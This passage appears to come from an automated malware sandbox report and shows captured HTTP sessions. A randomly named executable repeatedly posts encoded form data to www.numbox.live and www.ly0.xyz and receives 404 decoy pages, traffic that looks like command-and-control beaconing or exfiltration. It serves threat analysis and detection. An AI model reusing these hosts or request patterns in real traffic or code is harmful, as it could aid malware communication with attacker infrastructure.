                                                                                                                    Oct 24, 2024 05:09:01.315171003 CEST620INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 66 6f 6f 74 65 72 20 20 2d 2d 3e 0d 0a 3c 66 6f 6f 74 65 72 3e 0d 0a 20
                                                                                                                    Data Ascii: </div> </div> </div> </div></div>... footer --><footer> <div class="container clearfix"> <ul class="list-social pull-right"> <li><a class="icon-1" href="#"></a></li> <li><a class="icon-2" href="#">


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    31192.168.2.45003363.250.47.57805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:03.171505928 CEST10894OUTPOST /q7ah/ HTTP/1.1
                                                                                                                    Host: www.numbox.live
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.numbox.live
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.numbox.live/q7ah/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 2f 53 7a 56 50 53 77 56 65 4e 76 72 32 53 2f 55 57 47 49 53 2b 33 69 74 46 6a 69 45 42 70 4b 31 52 61 30 6b 7a 39 66 79 79 75 6c 33 36 77 46 63 39 51 6c 6e 6a 58 43 69 55 52 67 70 38 45 66 31 4a 75 55 56 6e 5a 6f 6c 61 4f 56 51 4d 31 36 6a 38 46 6b 4b 69 72 79 69 37 55 52 57 48 41 51 35 71 75 69 62 4e 47 6f 56 5a 59 59 4b 4b 41 6d 76 41 71 2f 6a 30 6d 34 38 2b 45 79 50 38 34 55 6c 56 4b 68 6b 2f 77 4d 78 4e 49 30 4c 32 42 57 55 58 57 34 69 53 4b 43 36 61 78 79 6e 2f 52 67 65 70 6d 2b 72 32 63 75 30 37 38 50 2b 2b 4f 55 38 30 63 6b 76 66 41 44 36 57 37 6c 67 75 79 58 61 30 4b 76 35 4d 6b 54 73 6b 48 36 71 54 38 4d 79 72 75 37 31 48 4f 43 45 4a 38 33 4a 6e 72 57 6b 4b 6c 66 31 6d 65 79 50 6a 50 4f 65 44 65 46 67 62 59 52 59 5a 31 59 7a 68 4e 37 37 61 53 64 34 5a 39 4e 6c 39 79 6f 65 63 77 51 48 5a 39 44 47 31 56 4f 72 47 70 41 4d 43 71 4f 35 43 4f 6c 66 39 39 51 79 66 46 33 6b 34 35 51 35 71 78 37 49 39 64 55 77 31 50 46 38 76 78 31 33 35 76 2b 58 68 47 39 42 77 7a 42 66 50 4f 54 6f 72 42 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=/SzVPSwVeNvr2S/UWGIS+3itFjiEBpK1Ra0kz9fyyul36wFc9QlnjXCiURgp8Ef1JuUVnZolaOVQM16j8FkKiryi7URWHAQ5quibNGoVZYYKKAmvAq/j0m48+EyP84UlVKhk/wMxNI0L2BWUXW4iSKC6axyn/Rgepm+r2cu078P++OU80ckvfAD6W7lguyXa0Kv5MkTskH6qT8Myru71HOCEJ83JnrWkKlf1meyPjPOeDeFgbYRYZ1YzhN77aSd4Z9Nl9yoecwQHZ9DG1VOrGpAMCqO5COlf99QyfF3k45Q5qx7I9dUw1PF8vx135v+XhG9BwzBfPOTorBIRmSiqZOF7b2kzbZKKN5k9xgGxuWp4ujkYFFGWG4NJXRm5/7/9aNphqcE/jyYYjS/FSsbM9cVoBM1arSc2TqEsQrYoM3VW4dPPpW4WnFxVl4LpfiYGoWHUTXGGMF+Rt/JJwQ6cFjiwoIIBXBkfKDevj8b1stbDRWofWZt9yVafH8PC5WtRIbW/AOSKc/9jWOUbMH4a3qiXjWxYm/P/Q9nX6/RdWyLJnXZjY83JIxZCAH+0rr3U2/LLfqc+qRxBQjhcLkYCM46XblsR5tgRbPPB40Z8y8rTilTtfZacnadXUyjWX+6IK3BtutKl5UbUAhx1a4/N5cVxxUJZPS3XEGYn5PyADnK+vEys1Fm4VIKWqxwWp7+f71eWf4augAKNEgzLRRdsgSj+GBtUhh8tRrv/ovxmI9EiALi9VCbd69/yKw2+pJAdhrt3kiugIi8+jwikrfLqYx9lm2GxDJNm+6F1JmxG67IqDYa/5kdmfUsfZEr8MmPfC1FANApnNJ2k+dMftShLZLoIOQrZPRK7hIDpAGO31bePhp/3X5hvSNwoPscKkVEKNXbNqtce4Y645ElxRUkHQaf7oPTUSXQ0sr1MOFGZjw9dFncBcfi+YD684t6w53lGIxu5Qy/s4JuKkinn/mzf6IT5KE679+iC8yNAXTr6ixumrjRV [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:09:03.869575024 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:03 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4395
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:09:03.869662046 CEST1236INData Raw: 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 73 2f
                                                                                                                    Data Ascii: -[if (gt IE 9)|!(IE)]>...>...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="text/css" media="
                                                                                                                    Oct 24, 2024 05:09:03.869715929 CEST1236INData Raw: 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 3c 61 20 68 72 65 66 3d 22 70 72 6f 63 65 73 73 2e 68 74 6d 6c 22 3e 50 72 6f 63 65 73 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 3e 0d
                                                                                                                    Data Ascii: <li class="sub-menu"><a href="process.html">Process</a> <ul> <li><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href="#">Process 03
                                                                                                                    Oct 24, 2024 05:09:03.869791031 CEST832INData Raw: 2e 76 61 6c 75 65 3d 3d 27 27 29 20 74 68 69 73 2e 76 61 6c 75 65 3d 27 27 22 20 6f 6e 46 6f 63 75 73 3d 22 69 66 28 74 68 69 73 2e 76 61 6c 75 65 20 3d 3d 27 27 20 29 20 74 68 69 73 2e 76 61 6c 75 65 3d 27 27 22 20 3e 0d 0a 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: .value=='') this.value=''" onFocus="if(this.value =='' ) this.value=''" > <a href="#" class="btn btn-1 ">Search</a> </div> </form> </div> </div> </div> </div> </div


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    32192.168.2.45003463.250.47.57805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:05.715007067 CEST530OUTGET /q7ah/?Qzj=yQb1MnoYePGa+D7HYWwXgG+nDQu6P4qgSNNB5eb+vdtsin1jnkdmikqCDVoWxFHrVuMckJ02SL88S12T7EptmvXNk3VDSDUHyMzwNFIiRJYEDhiEAb6niHg=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.numbox.live
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:09:06.409394026 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:06 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 4395
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><title>Codester | 404</title><meta charset="utf-8"><link rel="stylesheet" href="css/bootstrap.css" type="text/css" media="screen"><link rel="stylesheet" href="css/responsive.css" type="text/css" media="screen"><link rel="stylesheet" href="css/style.css" type="text/css" media="screen"><link href='http://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'><script src="js/jquery.js"></script><script src="js/superfish.js"></script><script src="js/jquery.easing.1.3.js"></script><script src="js/jquery.cookie.js"></script><script>jQuery(window).load(function () { jQuery('.spinner').animate({ 'opacity': 0 }, 1000, 'easeOutCubic', function () { jQuery(this).css('display', 'none') });});</script>...[if lt IE 8]><div style='text-align:center'><a href="http://www.microsoft.com/windows/internet-explorer/default.aspx?ocid=ie6_countdown_bannercode"><img src="http://www.theie6 [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:09:06.409436941 CEST1236INData Raw: 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c
                                                                                                                    Data Ascii: [endif]-->...[if (gt IE 9)|!(IE)]>...>...<![endif]-->...[if lt IE 9]><script src="js/html5.js"></script><link rel="stylesheet" href="css/docs.css" type="text/css" media="screen"><link rel="stylesheet" href="css/ie.css" type="te
                                                                                                                    Oct 24, 2024 05:09:06.409461021 CEST424INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 3c 61 20 68 72 65 66 3d 22 70 72 6f 63 65 73 73 2e 68 74 6d 6c 22 3e 50 72 6f 63 65 73 73 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: <li class="sub-menu"><a href="process.html">Process</a> <ul> <li><a href="#">Process 01</a></li> <li><a href="#">Process 02</a></li> <li><a href
                                                                                                                    Oct 24, 2024 05:09:06.409478903 CEST1236INData Raw: 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 68 65 61 64 65 72 3e 0d 0a 3c 64 69 76 20 63
                                                                                                                    Data Ascii: </div> </div> </div> </div> </div></header><div class="bg-content"> ... content --> <div id="content"> <div class="container"> <div class="row "> <div class="span12"> <d
                                                                                                                    Oct 24, 2024 05:09:06.409506083 CEST423INData Raw: 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 32 22 20 68 72 65 66 3d 22 23 22 3e 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d
                                                                                                                    Data Ascii: a></li> <li><a class="icon-2" href="#"></a></li> <li><a class="icon-3" href="#"></a></li> <li><a class="icon-4" href="#"></a></li> </ul> <div class="privacy pull-left">&copy; 2013 | <a href="http://www.dzyngiri.c


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    33192.168.2.450035104.21.78.104805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:11.500847101 CEST780OUTPOST /vshw/ HTTP/1.1
                                                                                                                    Host: www.ly0.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.ly0.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.ly0.xyz/vshw/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 4a 75 42 30 31 51 4c 52 4d 6f 47 31 78 61 43 75 2f 77 57 53 6c 73 61 4f 64 36 2f 4a 35 34 7a 57 4e 52 4b 6c 37 71 2b 56 37 6d 67 31 30 59 63 36 50 58 4d 2b 30 53 7a 32 6a 34 48 36 50 56 38 75 75 66 54 49 4a 73 33 66 59 75 5a 69 6f 7a 43 63 67 4b 6f 38 4d 59 53 4f 52 72 72 64 6d 53 73 56 2f 61 33 30 74 6b 44 46 6b 6c 63 55 71 43 68 2f 77 4a 5a 58 4f 65 4a 6b 46 4a 48 68 69 47 30 6e 6a 39 55 54 74 62 35 70 47 55 34 52 7a 42 72 7a 6a 6e 55 45 75 4d 4f 44 54 6c 7a 4a 66 35 4c 57 70 69 70 64 45 4b 79 52 4c 46 68 66 48 70 64 41 61 5a 35 2f 57 7a 2b 48 77 30 75 5a 7a 31 47 34 34 77 3d 3d
                                                                                                                    Data Ascii: Qzj=JuB01QLRMoG1xaCu/wWSlsaOd6/J54zWNRKl7q+V7mg10Yc6PXM+0Sz2j4H6PV8uufTIJs3fYuZiozCcgKo8MYSORrrdmSsV/a30tkDFklcUqCh/wJZXOeJkFJHhiG0nj9UTtb5pGU4RzBrzjnUEuMODTlzJf5LWpipdEKyRLFhfHpdAaZ5/Wz+Hw0uZz1G44w==
                                                                                                                    Oct 24, 2024 05:09:12.547717094 CEST1102INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:12 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K67qqacxrmcQWwlBPTWGXMxK%2Fvm08k3z7Z3YbtZ8Oq5ZTwLOUcoO0tKk9rUIoExzQeXLj%2FJHx%2BySst3AWVOVWffHX%2FzldCzkIFW7ybHTqSTTMAooQTGzlAO4Z72%2FEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d76c4463cdae76a-DFW
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1330&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=780&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 31 32 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 92 c1 6e c3 20 0c 86 ef 95 fa 0e 3e b6 92 d5 40 02 a4 51 19 97 4a 3b ee b2 27 c8 12 da 44 6a c8 c4 e8 96 bd fd e4 04 a2 a9 87 ed 80 31 f6 e7 1f 0c e8 2e 0c 37 b3 dd e8 ce d6 ad d1 a1 0f 37 6b 04 13 f0 32 06 78 1e ef ae d5 d9 12 d4 d9 8c 6c 37 fa 6d 6c bf 69 6e ac 0b d6 1b dd f1 c7 8a 8e 1b 9d c5 34 69 7b 93 60 77 ed dd f4 3b 97 cd 6a fa a3 f1 fd 7b 30 9f b5 87 29 c0 13 bc 06 df bb eb e1 e2 c7 e1 dc d5 fe 3c b6 76 a7 18 02 e7 12 a1 aa c8 11 08 9c 49 f2 72 32 0a a1 20 87 1d 11 aa 92 22 84 b3 82 bc 32 86 e6 15 e3 08 8a 23 14 02 39 53 09 5e ab fe d2 17 71 0f 2e 23 40 e4 aa 25 22 16 4d 02 e5 11 41 94 cb 88 95 1c 41 28 04 49 59 9a 29 93 f3 64 18 c3 99 23 64 3e c1 72 9e 24 c1 54 d4 79 58 c9 24 cf ca 45 24 0a 54 18 db 58 23 a9 84 fa 51 39 02 5d ac f8 af 79 95 ef 4f ed d8 dc 07 eb c2 e1 cb f7 c1 ee a6 b0 3f e9 2c 3e 1d bd 65 fc 4c 3f c2 ab eb 02 55 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 12an >@QJ;'Dj1.77k2xl7mlin4i{`w;j{0)<vIr2 "2#9S^q.#@%"MAA(IY)d#d>r$TyX$E$TX#Q9]yO?,>eL?U0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    34192.168.2.450036104.21.78.104805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:14.046545982 CEST800OUTPOST /vshw/ HTTP/1.1
                                                                                                                    Host: www.ly0.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.ly0.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.ly0.xyz/vshw/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 4a 75 42 30 31 51 4c 52 4d 6f 47 31 7a 35 71 75 2b 58 43 53 6e 4d 61 50 59 36 2f 4a 79 59 7a 53 4e 52 57 6c 37 6f 53 2f 37 54 77 31 31 34 73 36 41 79 77 2b 39 43 7a 32 78 59 48 6d 43 31 39 69 75 66 66 36 4a 75 54 66 59 75 4e 69 6f 79 79 63 67 63 67 37 4d 49 53 4d 59 4c 72 66 69 53 73 56 2f 61 33 30 74 6b 57 51 6b 6c 6b 55 70 78 4a 2f 68 62 78 55 43 2b 4a 6e 50 70 48 68 30 47 30 6a 6a 39 56 47 74 66 77 68 47 57 77 52 7a 44 7a 7a 69 32 55 48 67 4d 4f 46 65 46 79 43 56 62 4b 66 72 41 34 4c 4b 36 75 68 41 47 59 69 43 76 4d 61 4c 6f 59 6f 45 7a 61 30 74 7a 6e 74 2b 32 37 78 6a 78 4a 54 4c 66 6b 59 31 46 49 4a 69 6c 6d 6e 6c 73 77 56 65 55 59 3d
                                                                                                                    Data Ascii: Qzj=JuB01QLRMoG1z5qu+XCSnMaPY6/JyYzSNRWl7oS/7Tw114s6Ayw+9Cz2xYHmC19iuff6JuTfYuNioyycgcg7MISMYLrfiSsV/a30tkWQklkUpxJ/hbxUC+JnPpHh0G0jj9VGtfwhGWwRzDzzi2UHgMOFeFyCVbKfrA4LK6uhAGYiCvMaLoYoEza0tznt+27xjxJTLfkY1FIJilmnlswVeUY=
                                                                                                                    Oct 24, 2024 05:09:15.124953032 CEST1100INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:15 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0U6FDrURNnh%2BiPQaqhsBqzABoQ4AuGqTheNnXerAYfIcQa8QedIoQx%2B8CWJaEd4aJOf6wXw7mKNjrAO7d3fneeF9b4s49V98vq9MyIysOQtif2%2FJI%2FskDdn7PubqPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d76c4562856474c-DFW
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1713&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=800&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 31 32 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 92 c1 6e c3 20 0c 86 ef 95 fa 0e 3e b6 92 d5 40 02 a4 51 19 97 4a 3b ee b2 27 c8 12 da 44 6a c8 c4 e8 96 bd fd e4 04 a2 a9 87 ed 80 31 f6 e7 1f 0c e8 2e 0c 37 b3 dd e8 ce d6 ad d1 a1 0f 37 6b 04 13 f0 32 06 78 1e ef ae d5 d9 12 d4 d9 8c 6c 37 fa 6d 6c bf 69 6e ac 0b d6 1b dd f1 c7 8a 8e 1b 9d c5 34 69 7b 93 60 77 ed dd f4 3b 97 cd 6a fa a3 f1 fd 7b 30 9f b5 87 29 c0 13 bc 06 df bb eb e1 e2 c7 e1 dc d5 fe 3c b6 76 a7 18 02 e7 12 a1 aa c8 11 08 9c 49 f2 72 32 0a a1 20 87 1d 11 aa 92 22 84 b3 82 bc 32 86 e6 15 e3 08 8a 23 14 02 39 53 09 5e ab fe d2 17 71 0f 2e 23 40 e4 aa 25 22 16 4d 02 e5 11 41 94 cb 88 95 1c 41 28 04 49 59 9a 29 93 f3 64 18 c3 99 23 64 3e c1 72 9e 24 c1 54 d4 79 58 c9 24 cf ca 45 24 0a 54 18 db 58 23 a9 84 fa 51 39 02 5d ac f8 af 79 95 ef 4f ed d8 dc 07 eb c2 e1 cb f7 c1 ee a6 b0 3f e9 2c 3e 1d bd 65 fc 4c 3f c2 ab eb 02 55 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 12an >@QJ;'Dj1.77k2xl7mlin4i{`w;j{0)<vIr2 "2#9S^q.#@%"MAA(IY)d#d>r$TyX$E$TX#Q9]yO?,>eL?U0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    35192.168.2.450037104.21.78.104805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:16.596067905 CEST10882OUTPOST /vshw/ HTTP/1.1
                                                                                                                    Host: www.ly0.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.ly0.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.ly0.xyz/vshw/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
